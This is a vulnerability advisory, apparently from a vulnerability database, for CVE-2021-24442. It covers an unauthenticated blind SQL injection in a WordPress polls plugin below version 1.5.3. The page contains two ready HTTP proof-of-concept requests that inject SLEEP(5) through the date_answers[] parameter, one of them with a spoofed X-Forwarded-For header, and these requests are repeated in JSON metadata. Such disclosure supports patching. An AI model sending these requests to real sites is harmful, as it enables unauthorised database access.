Description
The plugin did not sanitise, escape or validate the `date_answers[]` POST parameter before using it in a SQL statement when a poll result is submitted through the `pollinsertvalues` admin-ajax action. Because the action is reachable without a session, unauthenticated visitors can perform (time-based) blind SQL Injection (CWE-89); the PoC below confirms it with a `SLEEP(5)` payload. Versions below 1.5.3 are affected; update to 1.5.3 or later.
### PoC
Both requests inject the same time-based payload, `date_answers[0]=SLEEP(5)`; a response delayed by roughly five seconds confirms the injection. The request is accepted with any session cookie or none. The `poll_answer_securety` value shown is the one captured by the reporter and presumably has to be taken from the target's rendered poll form — verify on the target. The only difference between the two variants is the `X-Forwarded-For` header: on 1.5.1–1.5.2 it must carry a fresh value on every request, which suggests those versions only added a repeat-submission check keyed on this client-controlled header rather than fixing the injection — confirm against the plugin source.

**v < 1.5.3**

```http
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)
```

**v < 1.5.1**

```http
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Cookie: [any user, authenticated or not]
Connection: close

question_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)
```
Affected Software
Related
{"id": "WPVDB-ID:7376666E-9B2A-4239-B11F-8544435B444A", "type": "wpvulndb", "bulletinFamily": "software", "title": "Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection", "description": "The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n\n### PoC\n\nv < 1.5.3 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 X-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done] Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) v < 1.5.1 POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Cookie: [any user, authenticated or not] Connection: close question_id=1&poll;_answer_securety=1c6ab7113b&date;_answers%5B0%5D=SLEEP(5) \n", "published": "2021-06-22T00:00:00", "modified": "2021-06-22T14:55:51", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, 
"cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a", "reporter": "Toby Jackson", "references": ["https://www.in-spired.xyz/wpdevart-polls-blind-sql-injection/"], "cvelist": ["CVE-2021-24442"], "immutableFields": [], "lastseen": "2021-09-14T23:16:39", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24442"]}, {"type": "patchstack", "idList": ["PATCHSTACK:F33705EDD93A27DFFE5EF26C153B3EF6"]}, {"type": "wpexploit", "idList": ["WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A"]}]}, "score": {"value": 0.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24442"]}, {"type": "wpexploit", "idList": ["WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A"]}]}, "exploitation": null, "vulnersScore": 0.6}, "affectedSoftware": [{"version": "1.5.3", "operator": "lt", "name": "polls-widget"}], "exploit": "v < 1.5.3\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nX-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\nv < 1.5.1\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: 
en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\n", "sourceData": "", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "32b709d5e506caa886e076753e323acc"}}
{"cve": [{"lastseen": "2022-03-23T14:54:45", "description": "The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T20:15:00", "type": "cve", "title": "CVE-2021-24442", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-07-15T15:35:00", "cpe": [], "id": "CVE-2021-24442", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24442", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:31:48", "description": "Unauthenticated Blind SQL Injection (SQLi) vulnerability discovered by Toby Jackson in WordPress Polls Widget plugin (versions <= 1.5.2).\n\n## Solution\n\n\r\n Update the WordPress Polls Widget plugin to the latest available version (at least 1.5.3).\r\n ", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "patchstack", "title": "WordPress Polls Widget plugin <= 1.5.2 - Unauthenticated Blind SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-06-22T00:00:00", "id": "PATCHSTACK:F33705EDD93A27DFFE5EF26C153B3EF6", "href": "https://patchstack.com/database/vulnerability/polls-widget/wordpress-polls-widget-plugin-1-5-2-unauthenticated-blind-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-09-14T23:16:39", "description": "The plugin did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": 
"NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "wpexploit", "title": "Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24442"], "modified": "2021-06-22T14:55:51", "id": "WPEX-ID:7376666E-9B2A-4239-B11F-8544435B444A", "href": "", "sourceData": "v < 1.5.3\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nX-Forwarded-For: Yolo [this value needs to be different each time, can be anything, no validation is done]\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\nv < 1.5.1\r\n\r\nPOST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 74\r\nCookie: [any user, authenticated or not]\r\nConnection: close\r\n\r\nquestion_id=1&poll_answer_securety=1c6ab7113b&date_answers%5B0%5D=SLEEP(5)\r\n\r\n", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}